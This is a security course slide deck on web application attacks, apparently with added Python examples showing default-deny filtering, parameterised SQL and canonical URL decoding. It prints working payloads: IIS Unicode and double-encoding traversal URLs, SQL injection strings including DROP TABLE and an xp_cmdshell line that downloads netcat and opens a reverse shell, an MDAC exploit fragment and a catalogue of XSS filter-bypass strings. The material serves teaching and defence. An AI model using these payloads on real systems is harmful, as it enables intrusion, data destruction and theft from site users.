Date posted: 26-Dec-2015 | Category: Documents | Uploaded by: cuthbert-charles
Network Security, Part II: Attacks
Web Attacks
Overview
• Web Architecture
• Web Hack Attacks
Web Architecture
• Web applications are important and this importance is accelerating
• Web applications are complex and this complexity is accelerating
This is Not New
• Problems with web applications are the same problems as with standalone applications
Why Target the Web
• Everyone is using it
• Safe bet the protocol will not become obsolete anytime soon
• New technology is being implemented/retrofitted on top (e.g. SOAP, WebDAV)
• It's everywhere! Mobile phones, cars, watches, toasters…
• Protocol fundamentally not suited to do a majority of what it's doing today
The Trouble with HTTP
• Multitude of involved technologies
• The involved protocols are extremely simple; therefore it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public-service, multi-user applications
• Stateless nature makes transaction-based systems tricky
How Did We Get Here?
• Unskilled/robotic programmers (“code mills”)
• Lack of security-oriented programming training
• Tendency to ‘code now, fix later’
• Current tools make it very easy to code insecurely
• Misconceptions about what ‘security’ really involves
Trouble Prone Areas of the Web
• Buffer overflows
– Classic bug that has been exploited for quite a while
– Lack of bounds-checking in the language a majority of web applications are written in, combined with poor programming practice
– Can exist in the web server, application server, database server, or the CGI programs
– Fortunately it is a well-advertised problem
– Many scripting languages and managed runtimes (ASP, PHP, Perl, .NET, etc.) are generally immune, as their strings and arrays grow automatically; the interpreters and servers they run on are written in C and are not
Trouble Prone Areas of the Web
• Cross-site scripting
– Reprinting user data without filtering it for web-specific characters
– Potential to trick users into executing JavaScript in the vulnerable site's context
– Partly a ‘social engineering’ technique
– More of a liability than a vulnerability: it is a way to hack the users, not the server
Trouble Prone Areas of the Web
• SQL tampering
– Web server already has/allows access to the database server
– Attacker can cause arbitrary SQL to be executed
– Results vary from data exposure to full system compromise
– Does not require direct database access!
– Many applications are vulnerable
– Stems from CGIs/scripts making assumptions about user input and not double checking/filtering
Trouble Prone Areas of the Web
• File includes
– It is common for a CGI to open and display or manipulate the contents of a file on the server
– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
– Can lead to information disclosure or script or command execution
Trouble Prone Areas of the Web
• Authentication weaknesses
– CGIs can fail to check credentials with every request
– Thus you bypass the login script and directly access the following scripts, without needing a username/password
– Or, certain actions/functions may not check for the proper authentication
Trouble Prone Areas of the Web
• Weak session mechanism
– The session/state mechanism uses predictable token IDs
– Or, the ID keyspace is too small for the number of users
– Either way, an attacker can ‘guess’ a valid token and hijack the session
Mid Range E-Commerce Roll-Out
• Web Server
• Application Server
• Database Server
• … and a Firewall
• Maybe some options…
– Load Balancer
– Reverse Proxy servers
– Cache systems
Typical Web Application Set-Up
(diagram) Web client → HTTP request (cleartext or SSL) → Firewall → Web server (Apache, IIS, Netscape, etc.) → Web apps via plugins (Perl, C/C++, JSP, etc.) → database connection (ADO, ODBC, etc.) → SQL database. The HTTP reply carries HTML, JavaScript, VBScript, etc.
Traditional Hacking
• Targeted against vulnerabilities in OS components and network services
– Buffer overflows
• Not portable; attacks specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.
Traditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.
    ...
    winsock_found:
        xor  eax, eax
        push eax
        inc  eax
        push eax
        inc  eax
        push eax
        call socket
        cmp  eax, -1
        jnz  socket_ok
        push sockerrl
        push offset sockerr
        call write_console
        jmp  quit2
    socket_ok:
        mov  sock, eax
        mov  sin.sin_family, 2
        mov  esi, offset _port
    ...
Limitations of Traditional Hacking…
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.
Utility of Firewalls
(diagram) Hacks on OS network services (wu-ftpd, Sun RPC, NT ipc$, …) are prevented by the firewall in front of the web server, web apps and SQL database. This limits traditional hacking.
Utility of Firewalls
(diagram) Internal back-end application servers are on a non-routable IP network (private addresses).
Utility of Firewalls
(diagram) Outbound access restricted. Why would a web server telnet out?
Futility of Firewalls
• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic.
• Why lay siege to the wall when you have an open door?
• Attacks based on content/applications are still viewed by some as rare.
Tools Required for Web Hacking
• A web browser
• An Internet connection
• … a clear mind and some spare time!
A Classification of Web Hacks
• Web attacks fall under the following general categories:
– Buffer overflow attacks
– SQL injection attacks
– Input validation attacks
– URL interpretation attacks
– Impersonation attacks
Firewalls Cannot Prevent…
(diagram) Web server misconfiguration, reached by the web client straight through the firewall
• Complexity mismanagement
• Indifference
Attack the Architecture
(diagram of the web server handler chain)
– html handler: returns the file with a text/html header
– shtml handler: processes SSI tags (#exec, #include), which can run /bin/sh or include a file, then returns text/html
– jsp handler: processes JSP tags, the Java compiler produces a class, the Java runtime executes it, returns text/html
– cgi handler: executes the script/executable (sh, perl, …)
– default handler: ??
Web Server Architecture Attacks
• Complex web server architectures can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.
Architecture Misconfigurations
• Handler Forcing:
– Certain misconfigurations allow handlers to be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
– Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.
JSP Handler Forcing
(diagram) The JSP handler (JSP page compile → Java compiler → class → Java runtime) is forced onto .html files instead of the html handler, which would simply return them with a text/html header.
Firewalls Cannot Prevent…
(diagram) Poor checking of user inputs in the web apps; URL interpretation attacks against the web server
• Input validation attacks
URL Interpretation Attacks
• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000 have been wrapped into a common definition: “The Unicode Bug.”
• URL parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands on the web server under the context of IUSR.
• Can lead to potential Administrator level access.
The IIS Unicode Bug
• Exploit: http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– The attacker could view a directory listing of the server's C:\ drive
• %c0%af is an overlong (non-canonical) UTF-8 encoding of “/” that the traversal check did not recognise but the file system layer decoded
• Can use HTTP POST to send multiple commands at a time to cmd.exe.
Web Hacking for Collateral Damage
• Web hacking can result in three types of collateral damage:
1. Information disclosure (paths etc.)
• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)
3. Arbitrary command execution
Source Code Disclosure
“Use the Source, Luke!”
• WebLogic / WebSphere “JSP” bug¹
• Ability to retrieve source code of JSP/JHTML files.
• Using uppercase “JSP” in the URL causes the server to return unparsed JSP code.
¹ Discovered by Shreeraj Shah, Foundstone.
A Classic Case of “Handler Mismatch”
(diagram) WebLogic server: the request index.JSP is not matched by the jsp, jhtml, shtml or html handlers and falls through to the default handler, although on the file system index.JSP = index.jsp. The default handler returns the file instead of sending it through JSP tag processing, the Java compiler and the Java runtime.
WebLogic handler registration:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
HTTP Request: index.JSP
More Source Disclosure
• URL prefixes for source code disclosure¹:
– /servlet/file/ (IBM WebSphere)
– /file/ (BEA WebLogic)
– /*.shtml/ (BEA WebLogic)
– /ConsoleHelp/ (BEA WebLogic)
– /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
¹ Advisories located on: http://www.foundstone.com/advisories.htm
… I Thought it was Functionality
• IIS “+.htr” bug.
– View source code of ASP/ASA files.
– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.
– Characters after the “+” sign (space) are ignored.
Doom on You…
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
  Set Db = Server.CreateObject("Commerce.DbServer")
  Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
  Db.Application = "http://10.1.1.16/"
  Set Application("Db") = Db
End Sub
Sub Session_OnStart
  '==Visual InterDev Generated - DataConnection startspan==
  '--Project Data Connection
  Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
  Session("DataConn_ConnectionTimeout") = 15
  Session("DataConn_CommandTimeout") = 30
  Session("DataConn_RuntimeUserName") = ""
  Session("DataConn_RuntimePassword") = ""
  '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>
User ID: sa
Password: n0t4u2c
More Source Disclosure
• Some applications access files without appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or location.
• Filenames can be manipulated via parameters passed on the URL or as hidden fields.
NT IIS Showcode ASP Vulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
Firewalls Cannot Prevent…
(diagram) HTTP request (cleartext or SSL) through the firewall: input validation attacks against the web apps, URL interpretation attacks against the web server, and extended SQL statements reaching the SQL database
• SQL Query Poisoning
SQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows:
http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3 OR 1=1
SQL Query Poisoning
• Drop Table:
http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query:
SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT
SQL Query Poisoning
• Remote Command Execution!
http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+‘tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed:
tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
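To see the “return all rows” case run end to end, here is an added example (not code from the presentation) that models showtable.asp with Python's sqlite3 module. The PRODUCT table, its rows and the showtable_* function names are constructed for the example; the attack string is the decoded form of the ID=3+OR+1=1 request above. The DROP TABLE and xp_cmdshell variants rely on the SQL Server/ODBC parser accepting the %01 separator, which SQLite does not, so they are not reproduced.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the PRODUCT table behind showtable.asp
    (example data, not from the original presentation)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT, PRICE REAL)")
    conn.executemany("INSERT INTO PRODUCT VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99), (3, "gizmo", 4.50)])
    return conn


def showtable_vulnerable(conn, id_param: str):
    """What showtable.asp effectively does: paste the untrusted ID parameter into
    the SQL text. The attacker now controls the whole WHERE clause."""
    sql = "SELECT * FROM PRODUCT WHERE ID=" + id_param
    return conn.execute(sql).fetchall()


def showtable_safe(conn, id_param: str):
    """Default-deny validation plus a bound parameter: the value is never parsed
    as SQL, so '3 OR 1=1' cannot extend the statement."""
    if not id_param.isdigit():
        raise ValueError("ID must be a positive integer")
    return conn.execute("SELECT * FROM PRODUCT WHERE ID=?", (int(id_param),)).fetchall()


def run_demo():
    """Send the slide's ID=3 and ID=3+OR+1=1 requests (already URL-decoded by the
    web server, so '+' has become a space) through both versions."""
    conn = make_db()
    result = {
        "vulnerable_normal": len(showtable_vulnerable(conn, "3")),
        "vulnerable_attack": len(showtable_vulnerable(conn, "3 OR 1=1")),
        "safe_normal": len(showtable_safe(conn, "3")),
    }
    try:
        showtable_safe(conn, "3 OR 1=1")
        result["safe_attack"] = "accepted"
    except ValueError:
        result["safe_attack"] = "rejected"
    return result


if __name__ == "__main__":
    print(run_demo())
```

The vulnerable version returns one row for ID=3 and every row for the poisoned parameter; the bound-parameter version returns the one row and refuses the poisoned value before it reaches the database.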
SQL Remote Commando
(diagram) 1. The attacker's web browser sends the poisoned request to IIS/ASP, which passes the query to the DB: SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000. 2. xp_cmdshell runs tftp against the attacker's tftp server to get nc.exe transferred over to the NT IIS box. 3. nc connects back to the attacker's listener (the slide shows it at port 2001) with cmd.exe attached: C:\>_
Firewalls Cannot Prevent…
(diagram) Reverse engineering HTTP cookies and HTTP session hijacking between web client and web server, alongside input validation attacks, SQL query poisoning and URL interpretation attacks
• Impersonation
Firewalls Cannot Prevent…
(diagram, same set-up as the typical web application: client, firewall, web server with plugins, web apps, ADO/ODBC database connection, SQL database)
• Application bugs
The MDAC Attack
• Vulnerability with Microsoft Data Access Components (msadcs.dll).
• MDAC allows remote users to perform SQL queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute arbitrary commands.
The MDAC Attack
(diagram) Client: Internet Explorer or VB.exe with the RDS Data Control / RDS Data Space. The request goes as a URL over HTTP to the IIS server (msadcs.dll, Remote Data Service), which hands it to the RDS Data Factory or custom business objects, through ADO (as ASP does) to the OLE DB / ODBC provider and the Jet 3.5 provider; HTML comes back.
The MDAC Attack
• Exploit (Perl fragment):
$query = "Select * from Customers where City='|shell(\"$command\")|'";
$dsn = "driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";
• Gain Administrator privileges on NT!
The MDAC Attack in Action
(diagram) 1. mdac.pl (exploit) sends the query to IIS 4.0 / msadcs.dll: SELECT * FROM Customers WHERE City = '|shell($command)|'. 2. The shell() call runs tftp against the attacker's tftp server to get nc.exe transferred over to the NT IIS box. 3. nc connects back to the listener (the slide shows it at port 2001) with a command prompt: C:\>_
The Effectiveness of Web Hacking
• By default ports 80 and 443 are usually allowed through firewalls. The open door…
• A single URL string is able to be processed by many different components.
• In most cases the only defense is reliance on secure coding.
Missile of Death
(diagram) One URL, http://10.0.0.1/catalog/display.asp?pg=1&product=7, passes through the firewall to the web server, the web apps and the database.
Cross Site Scripting, Why You Should Care
• XSS is not an attack on the server, it is an attack on the users of your application
• So what?
– Identity theft
– User masquerading
– Reputation risk
Cross Site Scripting (XSS)
• Found in 98% of applications
• 2 main types
– Transient (URL based): http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky: script placed in a static bit of web content
XSS continued…
• Transient generally requires user interaction
• What can happen?
– Possibilities are only restricted by the client
– Cookie theft most common example
• But I filter “<” and “>”
– JScript entities: “&{alert('Test')};”
Session Hijacking
• HTTP is stateless so application designers must build a way to track state
• Cookies and URL strings are the most common ways to track state
• Both are easily exploitable
Session Hijacking Continued…
• Generally the next thing to occur after XSS
• Examples of common session tracking issues
Parameter Tampering
• Programmers will store data anywhere!
– URL parameters: http://badapp.com/checkout.pl?p=$1.00
– Cookies: Cookie: p=$1.00
– Hidden fields: not really hidden
Unbound File Calls
• Ye Ole’ ../../
• Becomes an issue when the file displayed holds important information (global.asa)
• Most application languages will take URLs as file arguments
Do You Know Where Your Data is?
• Building an exclusionary filter is difficult because your data is all over the place
Data Flow Example
(diagram) Data from the Internet enters www.hackme.com and flows to the Customer Service database, the Marketing database and the Orders database.
Designing a proper filter
• Make all filters default deny
– Don't try to exclude “bad stuff”
• Requires a good idea where your data is going
• Log all filter violations
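As an added example of the default-deny filter described above (not code from the original slides), the allowlist below covers the parameter names that appear in URLs elsewhere in the deck (ID, pg, product, msg); the patterns, the logger name and the FilterViolation class are assumptions of the example.

```python
import re
import logging

log = logging.getLogger("webapp.filter")

# Allowlist: what each parameter is supposed to contain. Parameter names are the
# ones used in URLs on these slides; the patterns are this example's assumption.
ALLOWED = {
    "ID":      re.compile(r"[0-9]{1,9}"),                 # showtable.asp?ID=3
    "pg":      re.compile(r"[0-9]{1,4}"),                 # display.asp?pg=1
    "product": re.compile(r"[0-9]{1,9}"),                 # display.asp?product=7
    "msg":     re.compile(r"[A-Za-z0-9 .,!?'-]{0,200}"),  # error.jsp?msg=...
}


class FilterViolation(ValueError):
    pass


def validate(params: dict, client_ip: str = "0.0.0.0") -> dict:
    """Default-deny input filter. Apply it to the parameters after the web server
    has performed its single round of URL decoding. Unknown parameter names and
    values outside the allowlist are logged and rejected; nothing is 'cleaned'."""
    clean = {}
    for name, value in params.items():
        pattern = ALLOWED.get(name)
        if pattern is None:
            log.warning("filter violation from %s: unknown parameter %r", client_ip, name)
            raise FilterViolation(f"unknown parameter {name!r}")
        if pattern.fullmatch(value) is None:
            log.warning("filter violation from %s: %s=%r", client_ip, name, value)
            raise FilterViolation(f"value of {name!r} not in allowed form")
        clean[name] = value
    return clean


def accepted(params: dict) -> bool:
    """True if validate() lets the request through."""
    try:
        validate(params)
        return True
    except FilterViolation:
        return False
```

Because the filter names what is allowed rather than what is forbidden, the SQL and script payloads used on the other slides fail without any special case for them, and every rejection leaves a log line with the client address, the parameter and the value.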
Filter Bypassing is a Technique to Evade Detection by Filtering Systems
• Filter bypassing techniques come in many varieties when applied to the many facets of web application security.
• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
• Many of the described techniques can be highly effective when used properly and become even more powerful when used in combination.
Most filter systems are very simple
Seven forms of ingenuity:
• URL Encoded Strings
• Double Hex Encoding
• Unicode Encoded String
• Long URLs
• Case Sensitivity
• XSS Filter-Bypass Manipulation
• Null Character Injection
The Hex Advantage
By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64
Double Hex Encoding
• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
• When an unpatched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This secondary decoding was the source of another vulnerability.
IIS Double Hex
Round 1 decoding: scripts/..%255c../winnt becomes scripts/..%5c../winnt (%25 = “%” character)
Round 2 decoding: scripts/..%5c../winnt becomes scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through double hex encoding.
The Unicode Slash
• In UTF-8, “%c0%af” is an overlong encoding of the slash (“/”): invalid by the standard, but accepted by the IIS decoder.
• Therefore the common IIS URL exploit: scripts/..%c0%af../winnt
• becomes: scripts/../../winnt
Once again, directory path traversal is now possible using path obfuscation through Unicode.
Double Slash
• Double slash: using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd
• Can be used to move under the radar of IDS systems and still function properly.
Long URLs
• Many systems put limits on how much data a variable can store or a system can handle.
• Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
• URLs such as: http://www.foo.com/cgi?param=filename
• Replaced with: http://www.foo.com/cgi?param=<2K_of_Data>
Case Sensitivity
• Case sensitivity may play a role in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR
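An added example, not from the presentation, that parses the weblogic.httpd.register lines shown on the “Handler Mismatch” slide earlier and dispatches a request path against them; parse_registrations and dispatch are the example's own names. It shows the case-sensitivity point in handler form: an exact-case extension match sends index.JSP to the default file servlet (which returns the source), while a case-folded match sends it to the JSP servlet.

```python
# The four registration lines from the "Handler Mismatch" slide.
REGISTRATIONS = """
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
"""

PREFIX = "weblogic.httpd.register."


def parse_registrations(text: str):
    """Parse the register.* lines into ({'.jsp': servlet, ...}, default_servlet).
    'file' is the catch-all handler; '*.ext' keys map an extension to a servlet."""
    by_ext, default = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith(PREFIX):
            continue
        key, _, servlet = line[len(PREFIX):].partition("=")
        if key == "file":
            default = servlet
        elif key.startswith("*."):
            by_ext[key[1:]] = servlet          # '*.jsp' -> '.jsp'
    return by_ext, default


def dispatch(path: str, case_sensitive: bool = True) -> str:
    """Pick the servlet for a request path. With exact-case matching, index.JSP
    matches no registered extension and falls through to the default file
    servlet, which hands back the file as-is (the JSP source). On a
    case-insensitive file system that file is index.jsp. Folding case first
    routes the request to the JSP servlet as intended."""
    by_ext, default = parse_registrations(REGISTRATIONS)
    dot = path.rfind(".")
    ext = path[dot:] if dot >= 0 else ""
    if not case_sensitive:
        ext = ext.lower()
    return by_ext.get(ext, default)
```

Folding case in the handler lookup closes this particular disclosure only because the file system underneath is case-insensitive; the more robust fix is to never let a default file servlet serve from a directory that also holds source.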
Method Switching
• Many web applications do not properly perform HTTP request method sanity checking.
• Method switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log “POST” data, and thus forensic analysis is harder to perform.
The request method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 Methods
• OPTIONS
• GET
• HEAD
• POST
• PUT
• DELETE
• TRACE
• CONNECT
Using your “HEAD”
• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
• Scans and web application attacks can be made more effective using this technique.
Null Character Injection
• Hex-encoded null characters can be used to thwart some security mechanisms.
• This happens because in the “C” programming language a null character designates the end of a string.
• So if a CGI appends “.html” to an input parameter:
http://foo.com/cgi?file=../../etc/passwd%00
• the %00 will cut off the appended “.html”.
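The double-hex, Unicode-slash and null-byte slides describe three ways a check runs against something other than what the file system finally sees. The Python below is an added example (not part of the original deck) that models them: vulnerable_server percent-decodes once, checks for “..”, then decodes again with a UTF-8 decoder that, like the vulnerable IIS, accepts the overlong C0 AF form; fixed_server decodes exactly once with a strict decoder and checks the canonical result; opened_by_cgi shows the “.html” suffix being dropped at the %00. The function names and the traversal check are the example's own; the URL paths are the ones on the slides.

```python
from urllib.parse import unquote_to_bytes


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 the way the vulnerable IIS did: an overlong two-byte form such
    as C0 AF is accepted and yields the same code point as the one-byte form ('/').
    A conforming decoder rejects it. Anything else malformed becomes U+FFFD."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def has_traversal(path: str) -> bool:
    """The 'security check': a '..' segment under either separator escapes the root."""
    return any(seg == ".." for seg in path.replace("\\", "/").split("/"))


def vulnerable_server(url_path: str):
    """Models the IIS ordering the slides describe: one percent-decoding round,
    then the '..' check, then a second round that also interprets UTF-8.
    Returns the path that would be opened, or None if the check blocked it."""
    round1 = unquote_to_bytes(url_path)                 # %25 -> '%', %c0%af -> raw C0 AF
    if has_traversal(round1.decode("latin-1")):
        return None
    return lenient_utf8(unquote_to_bytes(round1))        # %5c -> '\', C0 AF -> '/'


def fixed_server(url_path: str):
    """Decode exactly once with a strict decoder, then check the canonical form."""
    try:
        decoded = unquote_to_bytes(url_path).decode("utf-8")  # overlong C0 AF raises
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded or has_traversal(decoded):
        return None
    return decoded


def opened_by_cgi(file_param: str) -> str:
    """A CGI that appends '.html' to its parameter and hands the result to a C
    runtime: the string ends at the first NUL, so %00 drops the suffix."""
    composed = unquote_to_bytes(file_param).decode("latin-1") + ".html"
    return composed.split("\x00", 1)[0]
```

Both bypasses on the slides pass the vulnerable check and come out as traversing paths; the fixed ordering turns the double-encoded path into a harmless literal filename, rejects the overlong sequence outright, and refuses anything containing a NUL.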
Unicode (UTF-8) Encoded
• Unicode is a universal way to represent characters.
• However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting Unicode.
URL Encoded String
• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
• “...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL.”
XSS Filter-Bypass Manipulation
• This technique is used to pass various types of client-side scripting language through implemented security filters.
• The idea is to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.
Hammer the Filters
• Submit all the raw HTML tags you can find, and then view the output results.
• Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).
• This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
SRCing the Protocol
• Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Alternate Protocol SRCing
• Same technique as the previous; however, using the protocols “livescript” and “mocha” will yield the same effect.
<IMG SRC="livescript:js_expression">
<IMG SRC="mocha:alert('test');">
Decimal HTML Entities
• Variation on previous techniques: using decimal HTML entities between the protocol characters can bypass filters, yet still execute JavaScript.
<IMG SRC="java&#09;script:js_expression">
• The entities for \09 \10 \11 \12 \13 have all been seen to work.
Hex HTML Entities
• Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.
<IMG SRC="java&#x09;script:js_expression">
Padding HTML Entities
• Padding HTML entities with 0's may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC="java&#0000009;script:js_expression">
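The entity, padding and whitespace variations above all collapse to the same scheme once decoded the way a browser decodes them. The Python below is an added example, not from the slides, that canonicalises a URL-valued attribute before deciding on it: html.unescape handles decimal, hex and zero-padded entities, control characters are dropped, case is folded, and only an allowlisted scheme passes (the ALLOWED_SCHEMES set and the function names are this example's assumptions). The &{…} JavaScript-entity syntax shown on the “and Curly” slide further on is refused outright.

```python
import html
import re

# Schemes an IMG/A/LINK/@import URL is allowed to carry (an assumption of this
# example; restrict it to exactly what the application needs and nothing more).
ALLOWED_SCHEMES = {"http", "https", "mailto"}

_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")


def canonical_scheme(attr_value: str) -> str:
    """Return the URL scheme a browser would act on, or '' for a relative URL.
    The steps mirror the bypasses on these slides: decode decimal, hex and
    zero-padded HTML entities; drop the C0 control characters and spaces that
    browsers ignore inside a scheme; fold case."""
    decoded = html.unescape(attr_value)
    stripped = re.sub(r"[\x00-\x20]", "", decoded)
    m = _SCHEME.match(stripped.lower())
    return m.group(1) if m else ""


def is_safe_url(attr_value: str) -> bool:
    """Default-deny check for a URL-valued attribute: relative URLs and the
    allowlisted schemes pass; javascript:, livescript:, mocha:, data: and
    everything else fails, as does the Netscape 4 '&{expr};' entity form."""
    if "&{" in attr_value:
        return False
    return canonical_scheme(attr_value) in ALLOWED_SCHEMES | {""}
```

Decoding first and matching the scheme against an allowlist is what makes the check stable: every new encoding trick a filter author has not seen still has to become the string "javascript" before the browser will run it, and that is the string the check sees too.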
STYLE JavaScript Type
• Changing the MIME type on a “style” tag may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">alert(document.domain);</style>
STYLE JavaScript X-Type
• Variation on the previous example, but by using the “application/x-javascript” MIME type the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
STYLE JavaScript Import
• Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
STYLE URL Import
• Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
LINK Style Sheet
• The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Style Left Expression
• A few CSS features used together to execute JavaScript.
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">
Remote SRCing
• A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME” and “IFRAME”, can be used to SRC in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
… and Curly
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert('alert')};">
• Syntax must be exact.
Dangerous HTML Tags
• “All HTML is to be considered dangerous, but these tags are the most insidious.”
– <APPLET>
– <BODY>
– <EMBED>
– <FRAME>
– <FRAMESET>
– <HTML>
– <IFRAME>
– <IMG>
– <LAYER>
– <ILAYER>
– <META>
– <OBJECT>
– <SCRIPT>
– <STYLE>
Dangerous HTML Attributes
• (HTML tags with these attributes.)
– SRC
– LOWSRC
– STYLE
– HREF
Web Application Logins
Traditional Brute Force
• guest
• Admin
• 123123
• Password
• etc.
Session ID Overview
• HTTP is a stateless protocol
• Rather than make a user authenticate upon each click in a web application, a sense of “state” is created
• In order to maintain state, a shared string, token, or secret between HTTP client and server is usually used by developers
• Essentially, authentication data (username/password) is exchanged for a “Session ID”
Web State Attacks
• Session Replay
– A traditional replay attack in the cryptography sense is an attack in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
• Session Hijacking
– Seizing control of a legitimate user's web application session while that user is “logged in” to the application
Session ID
